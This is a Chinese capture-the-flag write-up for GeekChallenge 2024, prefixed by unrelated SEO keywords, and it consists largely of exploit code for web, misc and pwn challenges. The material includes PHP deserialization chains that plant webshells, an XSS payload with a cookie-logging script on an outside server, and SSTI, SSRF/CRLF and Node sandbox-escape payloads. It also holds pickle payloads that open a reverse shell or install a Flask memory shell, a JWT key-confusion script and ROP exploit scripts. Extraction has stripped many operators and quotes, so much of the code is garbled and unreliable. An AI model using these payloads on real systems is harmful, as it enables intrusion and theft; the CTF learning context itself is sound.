网站设计工程师,静态网页文件,电商网站服务器,设计方案介绍极客大挑战2024wp
web 和misc 都没咋做出来#xff0c;全靠pwn✌带飞 排名
密码学和re没做出几个#xff0c;就不发了
web
ez_pop
源代码
?php
Class SYC{public $starven;public function __call($name, $arguments){if(preg_match(/%|iconv|UCS|UTF|rot|quoted…极客大挑战2024wp
web 和misc 都没咋做出来全靠pwn✌带飞 排名
密码学和re没做出几个就不发了
web
ez_pop
源代码
?php
Class SYC{public $starven;public function __call($name, $arguments){if(preg_match(/%|iconv|UCS|UTF|rot|quoted|base|zlib|zip|read/i,$this-starven)){die(no hack);}file_put_contents($this-starven,?php exit();.$this-starven);}
}Class lover{public $J1rry;public $meimeng;public function __destruct(){if(isset($this-J1rry)file_get_contents($this-J1rry)Welcome GeekChallenge 2024){echo success;$this-meimeng-source;}}public function __invoke(){echo $this-meimeng;}}Class Geek{public $GSBP;public function __get($name){$Challenge $this-GSBP;return $Challenge();}public function __toString(){$this-GSBP-Getflag();return Just do it;}}if($_GET[data]){if(preg_match(/meimeng/i,$_GET[data])){die(no hack);}unserialize($_GET[data]);
}else{highlight_file(__FILE__);
}pop 链子
lover::__destruct -Geek::__get -lover::__invoke -Geek::toString -SYC::__call为了使链子正常运行需要 把$lover-J1rrydata://text/plain,Welcome GeekChallenge 2024;
用伪协议控制file_get_contents的内容对于meimong的初步过滤用16进制绕过即可
然后是死亡exit的绕过由于黑名单过滤的很全这里就尝试strip_tags写入htaccess预包含flag文件名也给了 就是flag相关文章:https://xz.aliyun.com/t/8163
exp
?php
Class SYC{public $starven;}Class lover{public $J1rry;public $meimeng;public function __construct(){$this-J1rrydata://text/plain,Welcome GeekChallenge 2024;}
}Class Geek{public $GSBP;
}$anew lover();
$a-meimengnew Geek();
$a-meimeng-GSBPnew lover();
$a-meimeng-GSBP-meimengnew Geek();
$a-meimeng-GSBP-meimeng-GSBPnew SYC();
$a-meimeng-GSBP-meimeng-GSBP-starvenphp://filter/writestring.strip_tags/?php_value auto_prepend_file /flag\n#/resource.htaccess;
$expstr_replace(s:7:meimeng,S:7:\6d\65\69\6d\65\6e\67,serialize($a));
echo urlencode($exp);
echo \n;发送一次写入再刷新一次包含就可以看见flag problem_on_my_web
访问/manager提示要我传一个post参数url然后give gift on cookie感觉就是要打xss偷cookie
发送消息的地方填
script
img new Image();
img.srchttp:/ip/cookie.php?cookiedocument.cookie;
img.width 0;
img.height 0;
/scriptvps上放一个cookie.php
?php
$cookie $_GET[cookie];
$ip getenv(REMOTE_ADDR);
$time date(Y-m-d g:i:s);
$referer getenv(HTTP_REFERER);
$fp fopen( cookie.txt, a);
fwrite($fp,IP: .$ip. │ Date And Time: .$time. | Referer: .$referer. | Cookie: .$cookie.|||);
fclose($fp);
?发送了上面的xss信息后在manager路由传http://127.0.0.1即可过一会即可在cookie.txt里看到flag
ez_http
根据要求一个个添加参数和http头即可 import requestsurlhttp://80-ede138cf-40a4-4102-a7eb-cc54a3144be8.challenge.ctfplus.cn/?welcomegeekchallenge2024
cookies{ token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJTdGFydmVuIiwiYXVkIjoiQ3RmZXIiLCJpYXQiOjE3MzAwMTI2MzEsIm5iZiI6MTczMDAxMjYzMSwiZXhwIjoxNzMwMDE5ODMxLCJ1c2VybmFtZSI6IlN0YXJ2ZW4iLCJwYXNzd29yZCI6InF3ZXJ0MTIzNDU2IiwiaGFzRmxhZyI6dHJ1ZX0.rndv-ew4zbtQJZXgR_Quqa-xR-E6p1WXindKnLKbO4k}
header{X-Real-IP:127.0.0.1,Referer:https://www.sycsec.com,STARVEN:I_Want_Flag,}
data{username:Starven,password:qwert123456}resrequests.post(urlurl,datadata,headersheader,cookiescookies)
print(res.text)Can you pass me
ssti 绕过{%%}绕{{, attr绕[]关键词的过滤全用八进制编码然后发现不能直接查看flag用base64 /flag带出来
{%print(lipsum|attr(\137\137\147\154\157\142\141\154\163\137\137)|attr(\137\137\147\145\164\151\164\145\155\137\137)(\157\163)|attr(\160\157\160\145\156)(\142\141\163\145\066\064\040\057\146\154\141\147)|attr(\162\145\141\144)())%}ez_ssrf
www.zip泄露源码
h4d33333.php
?php
error_reporting(0);
if(!isset($_POST[user])){$userstranger;
}else{$user$_POST[user];
}if (isset($_GET[location])) {$location$_GET[location];$clientnew SoapClient(null,array(location$location,urihahaha,loginguest,passwordgueeeeest!!!!,user_agent$user.s Chrome));$client-calculator();echo file_get_contents(result);
}else{echo Please give me a location;
}calculator.php
?php
$adminaaaaaaaaaaaadmin;
$adminpassi_want_to_getI00_inMyT3st;function check($auth) {global $admin,$adminpass;$auth str_replace(Basic , , $auth);$auth base64_decode($auth);list($username, $password) explode(:, $auth);echo $username.br.$password;if($username$admin $password$adminpass) {return 1;}else{return 2;}
}
if($_SERVER[REMOTE_ADDR]!127.0.0.1){exit(Hacker);
}
$expression $_POST[expression];
$auth$_SERVER[HTTP_AUTHORIZATION];
if(isset($auth)){if (check($auth)2) {if(!preg_match(/^[0-9\-*\/]$/, $expression)) {die(Invalid expression);}else{$resulteval(return $expression;);file_put_contents(result,$result);}}else{$resulteval(return $expression;);file_put_contents(result,$result);}
}else{exit(Hacker);
}
calculator.php 需要本地访问h4d33333.php的SOAPcilient 对象可以触发__call 去访问文件头信息可控造成CRLF注入http头部的信息和请求参数都可以控制控制一下认证信息满足要求即可绕过白名单执行eval
crlf exp from urllib.parse import quote
payloadexpressionsystem(cat /flag);a
print(quote(ftest\r\nAUTHORIZATION:Basic YWFhYWFhYWFhYWFhZG1pbjppX3dhbnRfdG9fZ2V0STAwX2luTXlUM3N01\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: {len(payload)}\r\n\r\n{payload}))然后发送了但是返回的东西看不了还是直接访问/result得到的flag
not_just_pop
源码
?php
highlight_file(__FILE__);
ini_get(open_basedir);class lhRaMK7{public $Do;public $You;public $love;public $web;public function __invoke(){echo 我勒个豆看来你有点实力那接下来该怎么拿到flag呢.br;eval($this-web);}public function __wakeup(){$this-web$this-love;}public function __destruct(){die($this-You-execurise$this-Do);}}class Parar{private $execurise;public $lead;public $hansome;public function __set($name,$value){echo $this-lead;}public function __get($args){if(is_readable(/flag)){echo file_get_contents(/flag);}else{echo 还想直接读flag洗洗睡吧rce去.br;if ($this-execuriseman!) {echo 居然没坠机.br;if(isset($this-hansome-lover)){phpinfo();}}else{echo($this-execurise);echo 你也想被肘吗.br;}}}
}class Starven{public $girl;public $friend;public function __toString(){return 试试所想的呗说不定成功了.br.$this-girl-abc;}public function __call($args1,$args2){$func$this-friend;$func();}}
class SYC{private $lover;public $forever;public function __isset($args){return $this-forever-nononon();}}$Syclover$_GET[Syclover];
if (isset($Syclover)) {unserialize(base64_decode($Syclover));throw new Exception(None);
}else{echo(怎么不给我呢是不喜欢吗);
}
稍微复杂了一点的pop
lhRaMK7::__destruct - Parar::__set - Starven::__toString - Parar::__get -SYC::__isset -Starven::__call -lhRaMK7::__invoke从代码中就可以看出来flag无法直接读取感觉要提权为了顺利反序列化还要删掉最后的}触发fast-desruct绕过异常题目php版本还是7.2直接全部属性改为public
到eval的时候发现system用不了phpinfo发现有disable_function写个马然后蚁剑插件绕过exp
?php
// highlight_file(__FILE__);
// ini_get(open_basedir);class lhRaMK7{public $Do;public $You;public $love;public $web;public function __construct(){$this-Younew Parar();}}class Parar{public $execurise;public $lead;public $hansome;public function __construct(){$this-leadnew Starven();}
}class Starven{public $girl;public $friend;
}
class SYC{public $lover;public $forever;}$anew lhRaMK7();
$a-Younew Parar();
$a-You-leadnew Starven();
$a-You-lead-girl new Parar();
$a-You-lead-girl-execuriseman!;
$a-You-lead-girl-hansomenew SYC();
$a-You-lead-girl-hansome-forevernew Starven();
$a-You-lead-girl-hansome-forever-friendnew lhRaMK7();
// $a-You-lead-girl-hansome-forever-friend-lovephpinfo();;
$a-You-lead-girl-hansome-forever-friend-love$aPD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4;file_put_contents(shell.php,base64_decode($a));;
$expsubstr(serialize($a),0,-1);
echo base64_encode($exp);提权用sudo -l 有env直接env提权即可 nosanbox
一开始要登陆提示manggodb上网就找到了一个nosql注入的payload 类似mysql的万能密码
{username:{$ne:1},password: {$ne:1}}nodejs vm沙箱逃逸比较简单网上就有很多文章不能用引号于是全用模板字符串还能绕黑名单
本来的payload是利用报错带出命令结果这里不回显报错信息于是 写个 sh然后反弹shellexp
一次编码会有所以这里编码两次
throw new Proxy({}, {get: function(){const c arguments.callee.caller;const p (c.constructor.constructor(${return pro${cess}}))();const obj p.mainModule.require(${child_p${ro}cess});const ex Object.getOwnPropertyDescriptor(obj,${${exe}cSync} );return ex.value(${echo WW1GemFDQXRZeUFuWW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4NExqRXpOQzR5TVRVdU1qVXdMekV5TXpRZ01ENG1NU2M9 |base64 -d |base64 -d 1.sh}).toString();}
})然后sh 1.sh即可 baby_upload
发现上传的文件名可控一开始尝试s.php/啥的会报错后面尝试双写就绕过了 s.php.php
源代码用strstr函数获取后缀难怪可以
ez_include
require_once绕过 文章https://www.anquanke.com/post/id/213235
payload
?filephp://filter/readconvert.base64-encode/resource/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/starven_secret.php然后来到levelllll2.php
?php
error_reporting(0);
highlight_file(__FILE__);
if (isset($_GET [syc])){$file $_GET [syc];$hint register_argc_argv On;if (preg_match(/config|create|filter|download|phar|log|sess|-c|-d|%|data/i, $file)) {die(hint都给的这么明显了还不会做?);}if(substr($_SERVER[REQUEST_URI], -4) .php){include $file;}
}提示很明显了打pearcmd包含file变量不会用黑名单里的东西无伤大雅payload
?config-create/syc/usr/local/lib/php/pearcmd.php/?eval($_GET[1]);?/var/www/html/shell.php然后查看flag即可根目录没有在/proc/self/environ
php不比java差
源码
?php
highlight_file(__FILE__);
error_reporting(0);
include secret.php;class Challenge{public $file;public function Sink(){echo br!!!A GREAT STEP!!!br;echo Is there any file?br;if(file_exists($this-file)){global $FLAG;echo $FLAG;}}
}class Geek{public $a;public $b;public function __unserialize(array $data): void{$change$_GET[change];$FUNC$change($data);$FUNC();}
}class Syclover{public $Where;public $IS;public $Starven;public $Girlfriend;public function __toString(){echo __toString is calledbr;$eeenew $this-Where($this-IS);$fff$this-Starven;$eee-$fff($this-Girlfriend);}
}unserialize($_POST[data]);考了好多pop链这么喜欢pop吗
起点是__unserialize$data里的键值对用来还原对象的属性$change可控使用implode一个值设为
Syclover即可触发toString,然后就卡了一会再回去看题目发现提到了javajava反序列化常用反射经过搜索发现这里可以反射调用system直接看flag看不了那就写马发现要用filesuid提权exp
?phperror_reporting(0);class Challenge{public $file;
}class Geek{public $a;public $b;}class Syclover{public $Where;public $IS;public $Starven;public $Girlfriend;}
$anew Geek();
$a-anew Syclover();
$a-a-WhereReflectionFunction;
$a-a-ISsystem;
$a-a-StarveninvokeArgs;
$a-a-Girlfriendarray(echo ?eval(\$_POST[cmd]); /var/www/html/shell.php);
echo urlencode(serialize($a)); ez_python
注册登录后随便输入了点评论就提示访问/starven_s3cret访问获得源码分析
import os
import secrets
from flask import Flask, request, render_template_string, make_response, render_template, send_file
import pickle
import base64
import blackapp Flask(__name__)#To Ctfer给你源码只是给你漏洞点的hint怎么绕black.py黑盒唉无意义
app.route(/)
def index():return render_template_string(open(templates/index.html).read())app.route(/register, methods[GET, POST])
def register():if request.method POST:usname request.form[username]passwd request.form[password]if usname and passwd:heart_cookie secrets.token_hex(32)response make_response(fRegistered successfully with username: {usname} br Now you can go to /login to heal starvens heart)response.set_cookie(heart, heart_cookie)return responsereturn render_template(register.html)app.route(/login, methods[GET, POST])
def login():heart_cookie request.cookies.get(heart)if not heart_cookie:return render_template(warning.html)if request.method POST and request.cookies.get(heart) heart_cookie:statement request.form[statement]try:heal_state base64.b64decode(statement)print(heal_state)for i in black.blacklist:if i in heal_state:return render_template(waf.html)pickle.loads(heal_state)res make_response(fCongratulations! You accomplished the first step of healing Starvens broken heart!)flag os.getenv(GEEK_FLAG) or os.system(cat /flag)os.system(echo flag /flag)return resexcept Exception as e:print( e)passreturn Error!!!! give you hint: maybe you can view /starven_s3cretreturn render_template(login.html)app.route(/monologue,methods[GET,POST])
def joker():return render_template(joker.html)app.route(/starven_s3cret, methods[GET, POST])
def secret():return send_file(__file__,as_attachmentTrue)if __name__ __main__:app.run(host0.0.0.0, port5000, debugFalse)可以看到在login路由有个反序列化有个waf不知道尝试反弹shell 就触发了waf说要换个思路那就内存马用最常用的还不行笔记里往下翻了几个才找到能用的
payload:
import pickle
import base64
opcodebcbuiltins
exec
(Sapp.backup_funcapp.view_functions[index];app.view_functions[index]lambda : __import__(os).popen(request.args.get(cmd)).read() if cmd in request.args.keys() is not None else app.backup_func()
tR.print(base64.b64encode(opcode).decode())然后就在根路由传cmd参数命令即可看了看waf
blacklist [bnetcat, bbash, bvar, betc, bsocat, btelnet, bpython, bperl, bnc,bbefore_request,bafter_request,bteardown_request,bteardown,bcontext_processor,btemplate_filter,bsocket,bsh,bmkfifo,bncatbcurl,bwget,bphp,bruby,blua,bjava,bcpp,bgcc,bg,bconnect]rce_me
考察php的一些性质按要求传参即可 直接post startstart now md5(Geekchallenge2024_bmKtL)就是经典0e找一个数字sha1后0e的 有个 foreach ($_GET as $key $value) {$$key $value;}明显的变量覆盖后面的在get传对应参数名 intval漏洞php7.2.25时intval函数不能正常解析字符串形式的科学表达式会返回底数传year1e4intval($year)解析字符串1e4返回1过第一个条件后面的是$num1,数字和字符串相加php会把字符串转为数字再相加所以这是就会被解析为10000从而过第二个条件 purpose传数组就行preg_match无法处理数组。最后就可以rce了
payload
?year1e4purpose[]rcecodesystem(cat /flag);post: startstart now_[2024.geekchallenge.ctf10932435112jwt_pickle
感觉考点都在web并没涉及啥密码学知识
漏洞点在jwt的签名和检验的算法不一致encode是RS256decode确是RS256和HS256都可以
RS256是非对称加密HS256是对称加密我们可以通过工具rsa2sign.py得到公钥再写脚本把payload用HS256加密一次,密钥就用得到的公钥检验时允许HS256
introduction 有反序列化漏洞直接反弹shell 脚本
import jwt
import base64
# 修改了源码方可成功 site-packages/jwt/algorithms.py
# 注释掉抛出异常的部分
public -----BEGIN RSA PUBLIC KEY-----
MIIBCgKCAQEAs2aM9wXti4Lm3cBNsJ6edBuKsRaXxWJHIxDcuVRbAFWt7XLqBMg
NIWLeZ5O6rVkqz1SaD2aEHvyaxZMSN7vXHlgn5keVtTJRbDMldzP32F461rGa1K
DSvfac512Rl1Dlquq5RmZotsjDWV4xEGolgBVJoFv/M8X/WOzl9MMF7ZV22Fd
PsFjq4bX7koU3yadPDBRVNcAjuYEy4OybCOlhnt4zeg/NdK6Rxs763iBA5/ZusR
UAL9KmQ1wV7NDPtUjb3yBwv/3bHRj6drlW5cc/f6vJxv/xsA5WpgkLDhUCkH8A0
x9dvqeAXvlIFaJXp3Bk01jrqwWweoJlpQIDAQAB
-----END RSA PUBLIC KEY-----opcodebcos
system
(Sbash -c bash -i /dev/tcp/ip/port 01
tR.
opcodebase64.b64encode(opcode).decode()
payload{username: hello,password:e10adc3949ba59abbe56e057f20f883e,is_admin: True,introduction:opcode}
print(jwt.encode(payload, keypublic, algorithmHS256))SecretInDrivingSchool
源码发现后台地址访问后有提示密码是三位字母chenxing写了个字典就开始爆爆了半天发现就是SYC
进入后台有个编辑广告的地方里面是php代码改为rce的就出了用编码绕过waf
\x73\x79\x73\x74\x65\x6d(\x63\x61\x74\x20\x2f\x66\x6c\x61\x67);
system(cat /flag);100%的⚪
看js代码就有了base64解码
Misc
签到
关注公众号发送得flag
Truth of Word
附件是一个word文档
全选 然后字体变红就能看到第一段flag
复制一份后缀改为zip解压发现有个bin文件是宏返回docx查看宏得到第二段flag
查看解压出来的压缩包中的media文件夹在一张图片中发现第三段flag
SYC{W0rd_H5_Ama1n9_StrUCtu3e!}Welcome_jail
懒得思考了直接走继承链用chr绕过引号的过滤
[i for i in [].__class__.__mro__[-1].__subclasses__() if i.__name__ (chr(95)chr(119)chr(114)chr(97)chr(112)chr(95)chr(99)chr(108)chr(111)chr(115)chr(101))][0].__init__.__globals__[chr(115)chr(121)chr(115)chr(116)chr(101)chr(109)](chr(99)chr(97)chr(116)chr(32)chr(47)chr(104)chr(111)chr(109)chr(101)chr(47)chr(99)chr(116)chr(102)chr(47)chr(102)chr(108)chr(97)chr(103))cimbar
上网搜了一下icimbar是用摄像头来传文件的一种技术然后找到了各个字符对应的4位二进制的对应关系图https://aigcdaily.cn/news/b24u20oz8s9djnd/
一个个对着翻译即可然后二进制转ascii就行
舔狗的觉醒
附件解压是个txt里面一串16进制开头05 b4 30一看就是两两逆序写个脚本
with open(byte-revenge.txt,r) as file:ffile.read().replace( ,).replace(\n,)reversed_pairs .join([f[i:i2][::-1] for i in range(0, len(f), 2)])bin_databytes.fromhex(reversed_pairs)with open(a.zip,wb) as f:f.write(bin_data)解压得到的压缩包有个flag.pdf提示 感觉是图片的嵌套上网找了网站https://pdfcandy.com/来提取pdf所有图片就有了flag
dosomemath
给了源码那个算式本地跑一下是9872但是不能用数字看那个白名单就知道要用一些魔术方法来表示数字
打开vscode输入().__对着自动补全出的魔术方法一个个看就可以看到__ge__尝试了一下,就发现
().__ge__(())().__ge__(())2就可以通过().__ge__(())来构造任意数字9872分解为((16)*(((20)*(30))(17)))一个个肯定会太长的
payload
payload().__ge__(())def get_payload(num):tmp[payload]*numres.join(tmp)return res
#(16)*(((20)*(30))(17))
targetf({get_payload(16)})*((({get_payload(20)})*({get_payload(30)}))({get_payload(17)}))
print(target)
print(eval(target))ez_jpg
给了个txt一串很长的16进制翻到最后是8DFF明显是jpg的文件头逆序找ai写个脚本逆序下就行
得到一个有点乱的图片然后修改宽高就能看到一点flag用ps修一下更好看但是发现也可以直接看 ez_pcap_1
直接在smb2流量中找找就行在最后的那个读取文件的流量就有太菜了2做不出来
雪
解压附件得到图片和white.txt图片名字提到watermarkh就是盲水印用工具提取到Th1si4st8eK3y
根据题目名另一个snow隐写密钥就是Th1si4st8eK3y
SYC{Ma1by_y0u_w1ll_l1k3_sn0w}hard_jail
show看了看源码这个waf预期解感觉是要走内置函数的装饰器但是不咋会看到是white true 输入的直接尝试输入black[]之后waf就没了就可以直接命令执行了
乌龟
一听就感觉是无线电sstv解出来的图片上有密码deepsound用这个密码就解出了奇怪的东西问gpt说是logo语言的绘图指令找个网站把图画出来就有了flag PWN
买黑吗喽了吗
View里很明显有一个写str1的操作然后就在思考怎么办让Balance大于0x100但是实际上并不难新手随便买买都能触发(看不看得出来另说)触发后就能够泄漏程序基地址而后就可以正常ROP
from pwn import *io process(./syscall)\# io remote(nc1.ctfplus.cn, 31851)context.terminal [tmux, new-window]context.log_level debugcontext.arch amd64elf ELF(./syscall)libc elf.libcfor i in range(8):io.recv()io.sendline(b1)io.recv()io.sendline(b1)for i in range(6):io.recv()io.sendline(b1)io.recv()io.sendline(b2)\# gdb.attach(io)io.recv()io.sendline(b2)\# io.sendline(b2)io.send(b%p)\# io.sendline(b2)io.recvuntil(bThere are 8 commodity_1 and 6 commodity_2 in your pocket.\nAnd your Balance : 0x)elfbase int(io.recv(14), 16) - 0x4090log.info(elfbase: 0x%x % elfbase)pop_rdi elfbase 0x00000000000011f1log.info(pop_rdi: 0x%x % pop_rdi)ret elfbase 0x000000000000101alog.info(ret: 0x%x % ret)io.sendline(b3)io.recvuntil(bTell me your feedback:)payload bA*0x58 p64(pop_rdi) p64(elfbase elf.got[puts]) p64(elfbase elf.plt[puts]) p64(elfbase elf.sym[main])io.sendline(payload)io.recvuntil(bThanks for your feedback!Well do it better!\n)puts_addr u64(io.recv(6).ljust(8, b\x00))log.info(puts_addr: 0x%x % puts_addr)libcbase puts_addr - libc.sym[puts]log.info(libcbase: 0x%x % libcbase)system_addr libcbase libc.sym[system]log.info(system_addr: 0x%x % system_addr)str_bin_sh libcbase next(libc.search(b/bin/sh))log.info(str_bin_sh: 0x%x % str_bin_sh)io.sendline(b3)io.recvuntil(bTell me your feedback:)payload bA*0x58 p64(ret) p64(pop_rdi) p64(str_bin_sh) p64(system_addr)gdb.attach(io)io.sendline(payload)io.interactive()00000
之前打另一个比赛刚遇见过打/dev/urandom里的所谓真随机确实是不能爆破Geek没有给爆破机会算得上对新手友好直接一直给\x00就可以有机率过strcmp然后直接看flag
from pwn import *\# io process(./main)\# io remote(nc1.ctfplus.cn, 27071)context.terminal [tmux, new-window]context.log_level debugcontext.arch amd64while True:\# io process(./main)io remote(nc1.ctfplus.cn, 41863)io.recv()io.recv()try:io.sendline(b\x00)take io.recv(timeout1)if bThe password is wrong and you cannot access the secret files not in take:io.interactive()else:io.close()continueexcept:io.interactive()over_flow??
蛮有意思如果对照一下save_to_file和read_from_file再加一点调试就会发现实际上rdi会变成我们给的参数而read_from_file多溢出的一位会成为rax而后会调用syscall所以控参数和系统调用直接写在一个payload就行了(来自一个看到溢出发现就报错的敏感差点觉得又是啥没学过的新东西要补[大哭])
from pwn import *\# io process([./ld-2.??.so,./], env {LD_PRELOAD : ./libc-2.??.so})io process(./over_data)\# io remote(nc1.ctfplus.cn, 33092)elf ELF(./over_data)\# libc ELF(./libc-2.??.so)libc elf.libccontext(arch amd64, oslinux, terminal[tmux, new-window])context.log_level debugdbg lambda: (gdb.attach(io),pause())lg lambda n,s: log.info(\033[1;1;20m%s: 0x%x --\033[0m\033[1;3;20m %s \033[0m % (str(n), eval(str(s)), s))io.recvuntil(bplease input your choice\n)io.sendline(b2)io.recvuntil(bplease input file name)gdb.attach(io)io.send(b/bin/sh\x00\x3b)io.interactive()
Black_Myth_Wukong snprintf把格式化丢脸上了直接泄漏
然后试过直接正常用system rop但是很可惜调试会发现偏移不确定懒得调试直接让one_gadget填满了
from pwn import *\# io process(./main)io remote(nc1.ctfplus.cn, 29311)elf ELF(./main)libc elf.libccontext.terminal [tmux,new-window]context.log_level debugio.recvuntil(bPlease enter any key to enter the game...)\# io.send(bKKKKK)io.sendline()\# gdb.attach(io)io.recvuntil(b)io.sendline(b31)io.recvuntil(bYou defeated Guangzhi, and you obtained Guangzhi\s weapon. Please accept it: )libc_start_main int(io.recv(12), 16) - 231log.info(libc_start_main: hex(libc_start_main))libcbase libc_start_main - libc.symbols[__libc_start_main]log.info(libcbase: hex(libcbase))system libcbase libc.symbols[system]log.info(system: hex(system))str_bin_sh libcbase next(libc.search(b/bin/sh))log.info(str_bin_sh: hex(str_bin_sh))pop_rdi libcbase 0x000000000002164flog.info(pop_rdi: hex(pop_rdi))ret libcbase 0x00000000000008aalog.info(ret: hex(ret))onegadget libcbase 0x4f29elog.info(onegadget: hex(onegadget))\# gdb.attach(io)\# payload baaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaab\# payload bA*0xd8 p64(ret) p64(pop_rdi) p64(str_bin_sh) p64(system)payload p64(onegadget)*2*16print(hex(len(payload)))io.recvuntil(b)io.sendline(str(len(payload)).encode())\# payload payload.ljust(256, bA)io.sendline(payload)io.interactive()我的空调呢
第一反应还以为这个菜单是个堆题甚至堆题的模板都写好了。。。
然后才发现连malloc和free都没有想着这下完了又要搓好久哪的指针残留直接用完泄漏就想着肯定得看看程序具体指针了
结果代码太乱了懒得逆向直接一顿调试发现分配的时候没有负数检查再一看上面的got表直接心领神会直接写memset为system在delete里memset一个/bin/sh的块就行了
from pwn import *\# io process([./ld-2.??.so,./], env {LD_PRELOAD : ./libc-2.??.so})\# io process(./pwn)io remote(nc1.ctfplus.cn, 34033)elf ELF(./pwn)\# libc ELF(./libc-2.??.so)libc elf.libccontext(arch amd64, oslinux, terminal[tmux, new-window])context.log_level debugdbg lambda: (gdb.attach(io),pause())lg lambda n,s: log.info(\033[1;1;20m%s: 0x%x --\033[0m\033[1;3;20m %s \033[0m % (str(n), eval(str(s)), s))def choose(choice):io.sendlineafter(bYour chioce:, str(choice).encode())def alloc(beforecontent, aftercontent):\# def alloc(content):choose(1)\# io.sendlineafter(b, str(id).encode())\# io.sendlineafter(b, str(size).encode())\# io.sendlineafter(b, str(len(content)).encode())io.sendafter(bYour name:, beforecontent)io.sendafter(bIntroduce:, aftercontent)def delete(id):choose(3)io.sendlineafter(bIndex:, str(id).encode())def edit(id, content):choose(4)io.sendlineafter(bIndex:, str(id).encode())io.sendafter(bmessage:, content)def show(id):choose(2)io.sendlineafter(bIndex:, str(id).encode())choose(5)io.recvuntil(bPlease input an address.(such as 0xffff))\# gdb.attach(io)io.sendline(b0x404018)io.recvuntil(bmassege:)puts_addr u64(io.recv(6).ljust(8, b\x00))lg(puts_addr, puts_addr)libcbase puts_addr - libc.symbols[puts]lg(libcbase, libcbase)system libcbase libc.symbols[system]lg(system, system)str_bin_sh libcbase next(libc.search(b/bin/sh))lg(str_bin_sh, str_bin_sh)set_buf libcbase libc.symbols[setbuf]lg(set_buf, set_buf)printf libcbase libc.symbols[printf]lg(printf, printf)memset libcbase libc.symbols[memset]lg(memset, memset)read libcbase libc.symbols[read]lg(read, read)\# for i in range(0x10):\# alloc(str(i).encode(), str(i).encode())alloc(b/bin/sh\x00, b0)alloc(b1, b1)\# gdb.attach(io, b *0x4017e8)edit(-4, p64(set_buf) p64(printf) p64(system))delete(0)io.interactive()\# dbg()FindG???t
有了over_flow???的经验加上之前就听过可以在libc_start_main附近找0x0f05当syscall的手法就直接加了个爆破甚至懒得问ai写了个0x00~0xff遍历[捂脸]
from pwn import *\# io process(./pwn)elf ELF(./pwn)libc elf.libccontext.terminal [tmux, new-window]context.log_level debug\# gdb.attach(io)bytes_for [b\x00, b\x01, b\x02, b\x03, b\x04, b\x05, b\x06, b\x07, b\x08, b\x09, b\x0a, b\x0b, b\x0c, b\x0d, b\x0e, b\x0f, b\x10, b\x11, b\x12, b\x13, b\x14, b\x15, b\x16, b\x17, b\x18, b\x19, b\x1a, b\x1b, b\x1c, b\x1d, b\x1e, b\x1f, b\x20, b\x21, b\x22, b\x23, b\x24, b\x25, b\x26, b\x27, b\x28, b\x29, b\x2a, b\x2b, b\x2c, b\x2d, b\x2e, b\x2f, b\x30, b\x31, b\x32, b\x33, b\x34, b\x35, b\x36, b\x37, b\x38, b\x39, b\x3a, b\x3b, b\x3c, b\x3d, b\x3e, b\x3f, b\x40, b\x41, b\x42, b\x43, b\x44, b\x45, b\x46, b\x47, b\x48, b\x49, b\x4a, b\x4b, b\x4c, b\x4d, b\x4e, b\x4f, b\x50, b\x51, b\x52, b\x53, b\x54, b\x55, b\x56, b\x57, b\x58, b\x59, b\x5a, b\x5b, b\x5c, b\x5d, b\x5e, b\x5f, b\x60, b\x61, b\x62, b\x63, b\x64, b\x65, b\x66, b\x67, b\x68, b\x69, b\x6a, b\x6b, b\x6c, b\x6d, b\x6e, b\x6f, b\x70, b\x71, b\x72, b\x73, b\x74, b\x75, b\x76, b\x77, b\x78, b\x79, b\x7a, b\x7b, b\x7c, b\x7d, b\x7e, b\x7f, b\x80, b\x81, b\x82, b\x83, b\x84, b\x85, b\x86, b\x87, b\x88, b\x89, b\x8a, b\x8b, b\x8c, b\x8d, b\x8e, b\x8f, b\x90, b\x91, b\x92, b\x93, b\x94, b\x95, b\x96, b\x97, b\x98, b\x99, b\x9a, b\x9b, b\x9c, b\x9d, b\x9e, b\x9f, b\xa0, b\xa1, b\xa2, b\xa3, b\xa4, b\xa5, b\xa6, b\xa7, b\xa8, b\xa9, b\xaa, b\xab, b\xac, b\xad, b\ae, b\xaf, b\xb0, b\xb1, b\xb2, b\xb3, b\xb4, b\xb5, b\xb6, b\xb7, b\xb8, b\xb9, b\xba, b\xbb, b\xbc, b\xbd, b\xbe, b\xbf, b\xc0, b\xc1, b\xc2, b\xc3, b\xc4, b\xc5, b\xc6, b\xc7, b\xc8, b\xc9, b\xca, b\xcb, b\xcc, b\xcd, b\xce, b\xcf, b\xd0, b\xd1, b\xd2, b\xd3, b\xd4, b\xd5, b\xd6, b\xd7, b\xd8, b\xd9, b\xda, b\xdb, b\xdc, b\xdd, b\xde, b\xdf, b\xe0, b\xe1, b\xe2, b\xe3, b\xe4, b\xe5, b\xe6, b\xe7, b\xe8, b\xe9, b\xea, b\xeb, b\xec, b\xed, b\xee, b\xef, b\xf0, b\xf1, b\xf2, b\xf3, b\xf4, b\xf5, b\xf6, b\xf7, b\xf8, b\xf9, b\xfa, b\xfb, b\xfc, b\xfd, b\xfe, b\xff]for i in bytes_for:\# io process(./pwn2.34)io remote(nc1.ctfplus.cn, 17014)try:io.recvuntil(b \n)io.send(b/bin/sh\x00)io.recvuntil(bindex:\n)io.sendline(b88)io.sendline(i)io.recvuntil(bindex2:\n)\# gdb.attach(io, b *0x401158)io.sendline(b59)io.sendline(bcat flag)if b{ in io.recv():io.interactive()else:io.close()continueexcept:io.close()continuestruct_one_byte
又让我以为是堆题然后发现给了后门和泄漏觉得大事肯定不简单
然后一看代码太乱了不想逆直接调上了。。。
